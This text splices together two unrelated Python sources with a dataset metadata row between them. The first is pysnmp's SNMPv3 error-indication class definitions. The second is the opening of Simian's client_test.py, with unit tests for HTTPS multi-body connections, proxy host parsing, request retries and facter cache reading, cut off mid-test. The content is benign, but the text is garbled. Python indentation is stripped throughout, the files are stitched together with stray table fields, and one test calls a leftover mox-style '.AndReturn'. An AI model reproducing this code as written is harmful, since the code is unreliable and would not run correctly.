# This file is part of pysnmp software.
#
# Copyright (c) 2005-2016, Ilya Etingof <[email protected]>
# License: http://pysnmp.sf.net/license.html
#
class ErrorIndication:
"""SNMPv3 error-indication values"""
def __init__(self, descr=None):
self.__value = self.__descr = self.__class__.__name__[0].lower() + self.__class__.__name__[1:]
if descr:
self.__descr = descr
def __eq__(self, other):
return self.__value == other
def __ne__(self, other):
return self.__value != other
def __lt__(self, other):
return self.__value < other
def __le__(self, other):
return self.__value <= other
def __gt__(self, other):
return self.__value > other
def __ge__(self, other):
return self.__value >= other
def __str__(self):
return self.__descr
# SNMP message processing errors
class SerializationError(ErrorIndication):
pass
serializationError = SerializationError('SNMP message serialization error')
class DeserializationError(ErrorIndication):
pass
deserializationError = DeserializationError('SNMP message deserialization error')
class ParseError(DeserializationError):
pass
parseError = ParseError('SNMP message deserialization error')
class UnsupportedMsgProcessingModel(ErrorIndication):
pass
unsupportedMsgProcessingModel = UnsupportedMsgProcessingModel('Unknown SNMP message processing model ID encountered')
class UnknownPDUHandler(ErrorIndication):
pass
unknownPDUHandler = UnknownPDUHandler('Unhandled PDU type encountered')
class UnsupportedPDUtype(ErrorIndication):
pass
unsupportedPDUtype = UnsupportedPDUtype('Unsupported SNMP PDU type encountered')
class RequestTimedOut(ErrorIndication):
pass
requestTimedOut = RequestTimedOut('No SNMP response received before timeout')
class EmptyResponse(ErrorIndication):
pass
emptyResponse = EmptyResponse('Empty SNMP response message')
class NonReportable(ErrorIndication):
pass
nonReportable = NonReportable('Report PDU generation not attempted')
class DataMismatch(ErrorIndication):
pass
dataMismatch = DataMismatch('SNMP request/response parameters mismatched')
class EngineIDMismatch(ErrorIndication):
pass
engineIDMismatch = EngineIDMismatch('SNMP engine ID mismatch encountered')
class UnknownEngineID(ErrorIndication):
pass
unknownEngineID = UnknownEngineID('Unknown SNMP engine ID encountered')
class TooBig(ErrorIndication):
pass
tooBig = TooBig('SNMP message will be too big')
class LoopTerminated(ErrorIndication):
pass
loopTerminated = LoopTerminated('Infinite SNMP entities talk terminated')
class InvalidMsg(ErrorIndication):
pass
invalidMsg = InvalidMsg('Invalid SNMP message header parameters encountered')
# SNMP security modules errors
class UnknownCommunityName(ErrorIndication):
pass
unknownCommunityName = UnknownCommunityName('Unknown SNMP community name encountered')
class NoEncryption(ErrorIndication):
pass
noEncryption = NoEncryption('No encryption services configured')
class EncryptionError(ErrorIndication):
pass
encryptionError = EncryptionError('Ciphering services not available')
class DecryptionError(ErrorIndication):
pass
decryptionError = DecryptionError('Ciphering services not available or ciphertext is broken')
class NoAuthentication(ErrorIndication):
pass
noAuthentication = NoAuthentication('No authentication services configured')
class AuthenticationError(ErrorIndication):
pass
authenticationError = AuthenticationError('Ciphering services not available or bad parameters')
class AuthenticationFailure(ErrorIndication):
pass
authenticationFailure = AuthenticationFailure('Authenticator mismatched')
class UnsupportedAuthProtocol(ErrorIndication):
pass
unsupportedAuthProtocol = UnsupportedAuthProtocol('Authentication protocol is not supprted')
class UnsupportedPrivProtocol(ErrorIndication):
pass
unsupportedPrivProtocol = UnsupportedPrivProtocol('Privacy protocol is not supprted')
class UnknownSecurityName(ErrorIndication):
pass
unknownSecurityName = UnknownSecurityName('Unknown SNMP security name encountered')
class UnsupportedSecurityModel(ErrorIndication):
pass
unsupportedSecurityModel = UnsupportedSecurityModel('Unsupported SNMP security model')
class UnsupportedSecurityLevel(ErrorIndication):
pass
unsupportedSecurityLevel = UnsupportedSecurityLevel('Unsupported SNMP security level')
class NotInTimeWindow(ErrorIndication):
pass
notInTimeWindow = NotInTimeWindow('SNMP message timing parameters not in windows of trust')
# SNMP access-control errors
class NoSuchView(ErrorIndication):
pass
noSuchView = NoSuchView('No such MIB view currently exists')
class NoAccessEntry(ErrorIndication):
pass
noAccessEntry = NoAccessEntry('Access to MIB node denined')
class NoGroupName(ErrorIndication):
pass
noGroupName = NoGroupName('No such VACM group configured')
class NoSuchContext(ErrorIndication):
pass
noSuchContext = NoSuchContext('SNMP context now found')
class NotInView(ErrorIndication):
pass
notInView = NotInView('Requested OID is out of MIB view')
class AccessAllowed(ErrorIndication):
pass
accessAllowed = AccessAllowed()
class OtherError(ErrorIndication):
pass
otherError = OtherError('Unspecified SNMP engine error occurred')
# SNMP Apps errors
class OidNotIncreasing(ErrorIndication):
pass
oidNotIncreasing = OidNotIncreasing('OIDs are not increasing')
| bsd-2-clause | 6,112,383,067,007,407,000 | 23.909502 | 117 | 0.769482 | false |
googlearchive/simian | src/tests/simian/client/client_test.py | 1 | 41740 | #!/usr/bin/env python
#
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""client module tests."""
import httplib
import logging
import sys
from pyfakefs import fake_filesystem
import M2Crypto
import mock
import stubout
from google.apputils import app
from google.apputils import basetest
from simian import auth
from simian.client import client
class ClientModuleTest(basetest.TestCase):
"""Test the client module."""
def testConstants(self):
for a in [
'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN',
'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END',
'DEBUG', 'URL_UPLOADPKG']:
self.assertTrue(hasattr(client, a))
class MultiBodyConnectionTest(basetest.TestCase):
"""Test MultiBodyConnection class."""
def setUp(self):
super(MultiBodyConnectionTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.mbc = client.MultiBodyConnection()
def tearDown(self):
super(MultiBodyConnectionTest, self).tearDown()
self.stubs.UnsetAll()
def testSetProgressCallback(self):
"""Test SetProgressCallback()."""
fn = lambda x: 1
self.assertFalse(hasattr(self.mbc, '_progress_callback'))
self.mbc.SetProgressCallback(fn)
self.assertEqual(self.mbc._progress_callback, fn)
self.assertRaises(
client.Error,
self.mbc.SetProgressCallback, 1)
def testProgressCallback(self):
"""Test _ProgressCallback()."""
self.mbc._ProgressCallback(1, 2)
self.mbc._progress_callback = mock.Mock()
self.mbc._ProgressCallback(1, 2)
self.mbc._progress_callback.assert_called_with(1, 2)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
def testRequest(self, mock_request):
"""Test request()."""
fs = fake_filesystem.FakeFilesystem()
fake_os = fake_filesystem.FakeOsModule(fs)
fake_open = fake_filesystem.FakeFileOpen(fs)
file_name = '/f1'
file_size = 10000
f_body = 'x' * file_size
fs.CreateFile(file_name, contents=f_body)
fake_file = fake_open(file_name, 'r')
self.stubs.Set(client, 'os', fake_os)
method = 'GET'
url = '/foo'
body = ['hello', fake_file]
content_length = len(body[0]) + file_size
headers = {
'Content-Length': content_length,
}
self.mbc._is_https = False
self.mbc.send = mock.Mock()
self.mbc._ProgressCallback = mock.Mock()
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_request, 'request')
inorder_calls.attach_mock(self.mbc.send, 'send')
inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback')
self.mbc.request(method, url, body=body)
inorder_calls.assert_has_calls([
mock.call.request(self.mbc, method, url, headers=headers),
mock.call._ProgressCallback(0, content_length),
mock.call.send(body[0]),
mock.call._ProgressCallback(len(body[0]), content_length),
mock.call.send(f_body[:8192]),
mock.call._ProgressCallback(len(body[0]) + 8192, content_length),
mock.call.send(f_body[8192:]),
mock.call._ProgressCallback(len(body[0]) + file_size, content_length),
mock.call._ProgressCallback(len(body[0]) + file_size, content_length)])
class HTTPSMultiBodyConnectionTest(basetest.TestCase):
def setUp(self):
self.stubs = stubout.StubOutForTesting()
self.hostname = 'foohost'
self.mbc = client.HTTPSMultiBodyConnection(self.hostname)
def tearDown(self):
self.stubs.UnsetAll()
def testParentClassRequestAssumption(self):
"""Test assumptions of parent class request()."""
method = 'GET'
url = '/foo'
body = None
headers = {}
with mock.patch.object(
client.httplib.HTTPConnection,
'_send_request', return_value=-1) as mock_fn:
c = client.httplib.HTTPConnection(self.hostname)
self.assertEqual(None, c.request(method, url))
mock_fn.assert_called_once_with(method, url, body, headers)
@mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True)
@mock.patch.object(client.httplib.HTTPConnection, 'endheaders')
@mock.patch.object(client.httplib.HTTPConnection, 'putheader')
@mock.patch.object(client.httplib.HTTPConnection, 'putrequest')
def testParentClassSendRequestAssumptionEmptyBody(
self, putrequest_mock, putheader_mock, endheaders_mock, send_mock):
"""Test assumptions of parent class _send_request()."""
method = 'GET'
url = '/foo'
body1 = None
headers = {'foo': 'bar'}
inorder_calls = mock.Mock()
inorder_calls.attach_mock(putrequest_mock, 'putrequest')
inorder_calls.attach_mock(putheader_mock, 'putheader')
inorder_calls.attach_mock(endheaders_mock, 'endheaders')
inorder_calls.attach_mock(send_mock, 'send')
# with a None body supplied, send() is never called. on >=2.7
# endheaders is still called with the body contents, even if they
# are None.
c = client.httplib.HTTPConnection(self.hostname)
c._send_request(method, url, body1, headers)
expected = [
mock.call.putrequest(method, url),
mock.call.putheader('foo', headers['foo'])
]
if sys.version_info[0] >= 2 and sys.version_info[1] >= 7:
expected.append(mock.call.endheaders(body1))
else:
expected.append(mock.call.endheaders())
inorder_calls.assert_has_calls(expected)
@mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True)
@mock.patch.object(client.httplib.HTTPConnection, 'endheaders')
@mock.patch.object(client.httplib.HTTPConnection, 'putheader')
@mock.patch.object(client.httplib.HTTPConnection, 'putrequest')
def testParentClassSendRequestAssumption(
self, putrequest_mock, putheader_mock, endheaders_mock, send_mock):
"""Test assumptions of parent class _send_request()."""
method = 'GET'
url = '/foo'
body2 = 'howdy'
headers = {'foo': 'bar'}
inorder_calls = mock.Mock()
inorder_calls.attach_mock(putrequest_mock, 'putrequest')
inorder_calls.attach_mock(putheader_mock, 'putheader')
inorder_calls.attach_mock(endheaders_mock, 'endheaders')
inorder_calls.attach_mock(send_mock, 'send')
# with a body supplied, send() is called inside _send_request() on
# httplib < 2.6. in >=2.7 endheaders() sends the body and headers
# all at once.
expected = [
mock.call.putrequest(method, url),
mock.call.putheader('Content-Length', str(len(body2))),
mock.call.putheader('foo', headers['foo'])
]
if sys.version_info[0] >= 2 and sys.version_info[1] >= 7:
expected.append(mock.call.endheaders(body2))
else:
expected.append(mock.call.endheaders())
expected.append(mock.send(body2))
c = client.httplib.HTTPConnection(self.hostname)
c._send_request(method, url, body2, headers)
inorder_calls.assert_has_calls(expected)
def testDirectSendTypes(self):
"""Test the DIRECT_SEND_TYPES constant for sane values."""
self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
@mock.patch.object(client.httplib.HTTPConnection, 'send')
def testRequestSimple(self, mock_send, mock_request):
"""Test request with one body element."""
method = 'GET'
url = '/foo'
body = 'hello'
headers = {
'Content-Length': len(body),
'Host': self.hostname,
}
self.mbc.request(method, url, body=body)
mock_request.assert_called_once_with(
self.mbc,
method, url, headers=headers)
mock_send.assert_called_once_with(body)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
@mock.patch.object(client.httplib.HTTPConnection, 'send')
def testRequestMultiString(self, send_mock, request_mock):
"""Test request() with multiple body string elements."""
method = 'GET'
url = '/foo'
body = ['hello', 'there']
headers = {
'Content-Length': sum(map(len, body)),
'Host': self.hostname,
}
for s in body:
client.httplib.HTTPConnection.send(s).AndReturn(None)
self.mbc.request(method, url, body=body)
request_mock.assert_called_once_with(self.mbc, method, url, headers=headers)
send_mock.assert_has_calls([mock.call(x) for x in body])
@mock.patch.object(client.httplib.HTTPConnection, 'send')
@mock.patch.object(client.httplib.HTTPConnection, 'request')
def testRequestMultiMixed(self, request_mock, send_mock):
"""Test request() with multiple mixed body elements."""
filepath = '/somefilename'
f_body = 'there'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(filepath, contents=f_body)
fake_open = fake_filesystem.FakeFileOpen(fs)
f = fake_open(filepath)
method = 'GET'
url = '/foo'
body = ['hello', f]
content_length = len(body[0]) + len(f_body)
headers = {
'Content-Length': content_length,
'Host': self.hostname,
}
self.mbc.request(method, url, body=body)
request_mock.assert_called_once_with(self.mbc, method, url, headers=headers)
self.assertEqual(2, send_mock.call_count)
send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)])
def testSetCACertChain(self):
"""Test SetCACertChain()."""
self.mbc.SetCACertChain('foo')
self.assertEqual(self.mbc._ca_cert_chain, 'foo')
def testIsValidCert(self):
"""Test _IsValidCert()."""
self.assertEqual(1, self.mbc._IsValidCert(1, 1))
def testIsValidCertOkZero(self):
"""Test _IsValidCert()."""
cert = mock.create_autospec(M2Crypto.X509.X509)
cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name)
store = mock.create_autospec(M2Crypto.X509.X509_Store_Context)
store.get_current_cert.return_value = cert
cert.get_subject.return_value = cert_subject
cert_subject.__str__.return_value = 'valid'
self.assertEqual(0, self.mbc._IsValidCert(0, store))
cert_subject.__str__.assert_called()
@mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True)
def testLoadCACertChain(self, named_temporary_file_mock):
"""Test _LoadCACertChain()."""
temp_filepath = '/tmp/somefilename'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(temp_filepath)
fake_open = fake_filesystem.FakeFileOpen(fs)
tf = fake_open(temp_filepath, 'w')
named_temporary_file_mock.return_value = tf
ctx = mock.create_autospec(M2Crypto.SSL.Context)
ctx.load_verify_locations.return_value = 1
cert_chain = 'cert chain la la ..'
self.mbc._ca_cert_chain = cert_chain
self.mbc._LoadCACertChain(ctx)
self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read())
# mock 2.0.0 incorrectly binds spec to calls
ctx._spec_signature = None
ctx.assert_has_calls([
mock.call.load_verify_locations(cafile=tf.name),
mock.call.set_verify(
client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert,
depth=9, callback=self.mbc._IsValidCert)])
@mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True)
def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock):
"""Test _LoadCACertChain()."""
temp_filepath = '/tmp/somefilename'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(temp_filepath)
fake_open = fake_filesystem.FakeFileOpen(fs)
tf = fake_open(temp_filepath, 'w')
named_temporary_file_mock.return_value = tf
cert_chain = 'cert chain la la ..'
self.mbc._ca_cert_chain = cert_chain
ctx = mock.create_autospec(M2Crypto.SSL.Context)
self.assertRaises(
client.SimianClientError, self.mbc._LoadCACertChain, ctx)
ctx.load_verify_locations.assert_called_once_with(cafile=tf.name)
self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read())
def testLoadCACertChainWhenNone(self):
"""Test _LoadCACertChain()."""
self.assertRaises(
client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock())
@mock.patch.object(client.SSL, 'Context', autospec=True)
@mock.patch.object(client.SSL, 'Connection', autospec=True)
def testConnect(self, connection_mock, context_mock):
"""Test connect()."""
context = context_mock()
conn = connection_mock(context)
connection_mock.reset_mock()
context_mock.reset_mock()
self.mbc._ca_cert_chain = 'cert chain foo'
context_mock.return_value = context
connection_mock.return_value = conn
with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock:
self.mbc.connect()
self.assertEqual(self.mbc.sock, conn)
load_ca_chain_mock.assert_called_once_with(context)
context_mock.assert_called_once_with(client._SSL_VERSION)
connection_mock.assert_called_once_with(context)
conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port))
if client._CIPHER_LIST:
context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)])
def testConnectWhenNoCACertChain(self):
"""Test connect()."""
context = mock.create_autospec(M2Crypto.SSL.Context)
with mock.patch.object(client.SSL, 'Context', return_value=context):
self.assertRaises(client.SimianClientError, self.mbc.connect)
if client._CIPHER_LIST:
context.assert_has_calls(
[mock.call.set_cipher_list(client._CIPHER_LIST)])
class HttpsClientTest(basetest.TestCase):
"""Test HttpsClient class."""
def setUp(self):
super(HttpsClientTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.hostname = 'hostname'
self.port = None
self.client = client.HttpsClient(self.hostname)
def tearDown(self):
super(HttpsClientTest, self).tearDown()
self.stubs.UnsetAll()
@mock.patch.object(client.HttpsClient, '_LoadHost')
def testInit(self, mock_lh):
"""Test __init__()."""
i = client.HttpsClient(self.hostname)
self.assertEqual(i._progress_callback, None)
self.assertEqual(i._ca_cert_chain, None)
mock_lh.assert_called_once_with(self.hostname, None, None)
def testLoadHost(self):
"""Test _LoadHost()."""
self.client._LoadHost('host')
self.assertEqual(self.client.hostname, 'host')
self.assertEqual(self.client.port, None)
self.assertTrue(self.client.use_https)
self.client._LoadHost('host', 12345)
self.assertEqual(self.client.hostname, 'host')
self.assertEqual(self.client.port, 12345)
self.assertTrue(self.client.use_https)
self.client._LoadHost('https://tsoh:54321')
self.assertEqual(self.client.hostname, 'tsoh')
self.assertEqual(self.client.port, 54321)
self.assertTrue(self.client.use_https)
self.client._LoadHost('https://tsoh:54321', 9999)
self.assertEqual(self.client.hostname, 'tsoh')
self.assertEqual(self.client.port, 54321)
self.assertTrue(self.client.use_https)
self.client._LoadHost('foo.bar:5555')
self.assertEqual(self.client.hostname, 'foo.bar')
self.assertEqual(self.client.port, 5555)
self.assertTrue(self.client.use_https)
self.client._LoadHost('http://nonsecurehost')
self.assertEqual(self.client.hostname, 'nonsecurehost')
self.assertEqual(self.client.port, None)
self.assertFalse(self.client.use_https)
self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(
self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(self.client.port, None)
self.assertTrue(self.client.use_https)
self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(
self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(self.client.port, None)
self.assertFalse(self.client.use_https)
self.client._LoadHost('http://nonsecurehost:1234')
self.assertEqual(self.client.hostname, 'nonsecurehost')
self.assertEqual(self.client.port, 1234)
self.assertFalse(self.client.use_https)
self.client._LoadHost(u'http://unicodehost')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.assertTrue(type(self.client.proxy_hostname) is str)
self.assertEqual(self.client.proxy_hostname, 'evilproxy')
self.assertEqual(self.client.proxy_port, 9)
self.assertFalse(self.client.proxy_use_https)
self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.assertTrue(type(self.client.proxy_hostname) is str)
self.assertEqual(self.client.proxy_hostname, 'evilprxssl')
self.assertEqual(self.client.proxy_port, 8)
self.assertTrue(self.client.proxy_use_https)
def testSetCACertChain(self):
"""Test SetCACertChain()."""
self.client.SetCACertChain('foo')
self.assertEqual(self.client._ca_cert_chain, 'foo')
def _TestConnect(self, test_client, hostname, port):
"""Test _Connect()."""
m = mock.Mock()
m.return_value = m
test_client._ca_cert_chain = 'cert chain'
use_https = (
(not test_client.proxy_hostname and test_client.use_https) or
(test_client.proxy_hostname and test_client.proxy_use_https))
if use_https:
self.stubs.Set(client, 'HTTPSMultiBodyConnection', m)
else:
self.stubs.Set(client, 'HTTPMultiBodyConnection', m)
expected = [mock.call(hostname, port)]
if use_https:
expected.append(mock.call.SetCACertChain('cert chain'))
expected.append(mock.call.connect())
test_client._Connect()
m.assert_has_calls(expected)
def testConnect(self):
self._TestConnect(self.client, self.hostname, self.port)
def testConnectWithProxy(self):
test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123')
self._TestConnect(test_client, 'proxyhost', 123)
def testGetResponseNoFile(self):
"""Test _GetResponse() storing body directly into response obj."""
headers = {'foo': 1}
status = 200
body = 'howdy sir'
body_len = len(body)
response = mock.create_autospec(httplib.HTTPResponse)
response.getheaders.return_value = headers
response.read.side_effect = [body, None]
response.status = status
response.reason = 'OK'
conn = mock.create_autospec(httplib.HTTPConnection)
conn.getresponse.return_value = response
r = self.client._GetResponse(conn)
self.assertEqual(r.headers, headers)
self.assertEqual(r.status, status)
self.assertEqual(r.body, body)
self.assertEqual(r.body_len, body_len)
def testGetResponseOutputFile(self):
"""Test _GetResponse() sending the body to output_file."""
headers = {'foo': 1}
status = 200
body = 'howdy sir'
body_len = len(body)
path = '/file'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(path)
fake_open = fake_filesystem.FakeFileOpen(fs)
output_file = fake_open(path, 'w')
response = mock.create_autospec(httplib.HTTPResponse)
response.getheaders.return_value = headers
response.read.side_effect = [body, None]
response.status = status
response.reason = 'Ok'
conn = mock.create_autospec(httplib.HTTPSConnection)
conn.getresponse.return_value = response
r = self.client._GetResponse(conn, output_file=output_file)
self.assertEqual(r.headers, headers)
self.assertEqual(r.status, status)
self.assertEqual(r.body, None)
self.assertEqual(r.body_len, body_len)
output_file.close()
self.assertEqual(body, fake_open(path).read())
def testRequest(self):
"""Test _Request()."""
method = 'zGET'
url = u'/url'
body1 = {'encodeme': 1}
body1_encoded = client.urllib.urlencode(body1)
body2 = 'leave this alone'
headers = {'User-Agent': 'gzip'}
conn = mock.create_autospec(httplib.HTTPConnection)
self.client._Request(method, conn, url, body1, headers)
self.client._Request(method, conn, url, body2, headers)
conn.request.assert_has_calls([
mock.call(method, str(url), body=body1_encoded, headers=headers),
mock.call(method, str(url), body=body2, headers=headers)])
def _TestDoRequestResponse(self, test_client, url, req_url):
"""Test _DoRequestResponse()."""
method = 'zomg'
conn = mock.create_autospec(httplib.HTTPConnection)
body = 'body'
headers = 'headers'
output_file = None
response = mock.create_autospec(httplib.HTTPResponse)
response.status = 200
proxy_use_https = test_client.proxy_use_https
with mock.patch.object(test_client, '_Connect', return_value=conn):
request_mock = mock.create_autospec(test_client._Request)
self.stubs.Set(test_client, '_Request', request_mock)
get_response_mock = mock.Mock(return_value=response)
self.stubs.Set(test_client, '_GetResponse', get_response_mock)
self.assertEqual(
response,
test_client._DoRequestResponse(
method, url, body, headers, output_file))
request_mock.assert_called_once_with(
method, conn, req_url, body=body, headers=headers)
get_response_mock.assert_called_once_with(conn, output_file=output_file)
conn.assert_not_called()
response.assert_not_called()
with mock.patch.object(
test_client, '_Connect', side_effect=client.httplib.HTTPException):
self.assertRaises(
client.HTTPError,
test_client._DoRequestResponse,
method, url, body, headers, output_file)
def testDoRequestResponse(self):
self._TestDoRequestResponse(self.client, '/url', '/url')
def testDoHttpRequestResponseWithHttpProxy(self):
"""Test a https request via a http proxy."""
test_client = client.HttpsClient(
'http://%s' % self.hostname, proxy='proxyhost:123')
req_url = 'http://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpsRequestResponseWithHttpProxy(self):
"""Test a https request via a http proxy."""
# default is https
test_client = client.HttpsClient(
self.hostname, proxy='http://proxyhost:124')
req_url = 'https://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpRequestResponseWithHttpsProxy(self):
"""Test a https request via a http proxy."""
test_client = client.HttpsClient(
'http://%s' % self.hostname, proxy='https://proxyhost:125')
req_url = 'http://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpsRequestResponseWithHttpsProxy(self):
"""Test a https request via a http proxy."""
# default is https
test_client = client.HttpsClient(
self.hostname, proxy='https://proxyhost:126')
req_url = 'https://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoWithInvalidMethod(self):
"""Test Do() with invalid method."""
self.assertRaises(
NotImplementedError,
self.client.Do, 'badmethod', '/url')
@mock.patch.object(client.time, 'sleep')
def testDo(self, mock_sleep):
"""Test Do() with correct arguments and no output_filename."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
# HTTP 500 should retry.
mock_response_fail = mock.create_autospec(httplib.HTTPResponse)
mock_response_fail.status = 500
# HTTP 200 should succeed.
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 200
with mock.patch.object(
self.client,
'_DoRequestResponse',
side_effect=[
mock_response_fail, mock_response]) as mock_do_request_response:
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
do_request_response_call = mock.call._DoRequestResponse(
method, url, body=body, headers={}, output_file=output_file)
self.client.Do(method, url, body, headers, output_filename)
inorder_calls.assert_has_calls([
mock.call.sleep(0), do_request_response_call,
mock.call.sleep(5), do_request_response_call])
@mock.patch.object(client.time, 'sleep')
def testDoWithRetryHttp500(self, mock_sleep):
"""Test Do() with a HTTP 500, thus a retry."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 500
with mock.patch.object(
self.client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
self.client.Do(method, url, body, headers, output_filename)
expected = []
for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS):
expected += [
mock.call.sleep(i * 5),
mock.call._DoRequestResponse(
method, url, body=body, headers={},
output_file=output_file)]
inorder_calls.assert_has_calls(expected)
@mock.patch.object(client.time, 'sleep')
def testDoWithRetryHttpError(self, mock_sleep):
"""Test Do() with a HTTP 500, thus a retry, but ending with HTTPError."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 500
with mock.patch.object(
self.client,
'_DoRequestResponse',
side_effect=client.HTTPError) as mock_do_request_response:
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
self.assertRaises(
client.HTTPError,
self.client.Do,
method, url, body, headers, output_filename)
expected = []
for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS):
expected += [
mock.call.sleep(i * 5),
mock.call._DoRequestResponse(
method, url, body=body, headers={},
output_file=output_file)]
inorder_calls.assert_has_calls(expected)
def testDoWithOutputFilename(self):
"""Test Do() where an output_filename is supplied."""
method = 'GET'
url = 'url'
body = None
headers = {}
output_file = mock.create_autospec(file)
mock_open = mock.Mock(return_value=output_file)
output_filename = '/tmpfile'
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 200
with mock.patch.object(
self.client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
self.client.Do(
method, url, body, headers, output_filename, _open=mock_open)
mock_do_request_response.assert_called_once_with(
method, url, body=body, headers={}, output_file=output_file)
def testDoWithProxy(self):
"""Test Do() with a proxy specified."""
method = 'GET'
url = 'url'
proxy = 'proxyhost:123'
# Working case.
mock_response = mock.create_autospec(httplib.HTTPConnection)
mock_response.status = 200
test_client = client.HttpsClient(self.hostname, proxy=proxy)
with mock.patch.object(
test_client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
test_client.Do(method, url)
mock_do_request_response.assert_called_once_with(
method, url, body=None, headers={}, output_file=None)
# No port case.
proxy = 'proxyhost'
self.assertRaises(
client.Error,
client.HttpsClient, self.hostname, proxy=proxy)
# Bad port case.
proxy = 'proxyhost:alpha'
self.assertRaises(
client.Error,
client.HttpsClient, self.hostname, proxy=proxy)
class HttpsAuthClientTest(basetest.TestCase):
"""Test HttpsAuthClient."""
def setUp(self):
super(HttpsAuthClientTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.hostname = 'hostname'
self.port = None
self.client = client.HttpsAuthClient(self.hostname)
self.fs = fake_filesystem.FakeFilesystem()
fake_os = fake_filesystem.FakeOsModule(self.fs)
self.fake_open = fake_filesystem.FakeFileOpen(self.fs)
self.stubs.Set(client, 'os', fake_os)
def tearDown(self):
super(HttpsAuthClientTest, self).tearDown()
self.stubs.UnsetAll()
@mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain')
def testInit(self, _):
"""Test __init__()."""
c = client.HttpsAuthClient(self.hostname)
self.assertEqual(c._auth1, None)
self.assertEqual(c._cookie_token, None)
def testPlatformSetup(self):
"""Test PlatformSetup()."""
with mock.patch.object(client.platform, 'system', return_value='Darwin'):
self.client.facter_cache_path = 'x'
self.client._PlatformSetup()
self.assertEqual(
self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH)
with mock.patch.object(client.platform, 'system', return_value='other'):
self.client.facter_cache_path = 'x'
self.client._PlatformSetup()
self.assertEqual(
self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH)
def testGetFacter(self):
"""Test GetFacter()."""
st_dt = client.datetime.datetime.now()
facter = {'foo': 'bar', 'one': '1'}
file_path = '/x'
lines = [
'foo => bar',
'one => 1',
'I_am_invalid',
]
fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines))
fake_file.st_uid = 0
fake_file.st_mtime = int(st_dt.strftime('%s'))
self.client.facter_cache_path = file_path
with mock.patch.object(client.os, 'geteuid', return_value=0):
self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open))
def testGetFacterWhenInsecureFileForRoot(self):
"""Test GetFacter()."""
file_path = '/x'
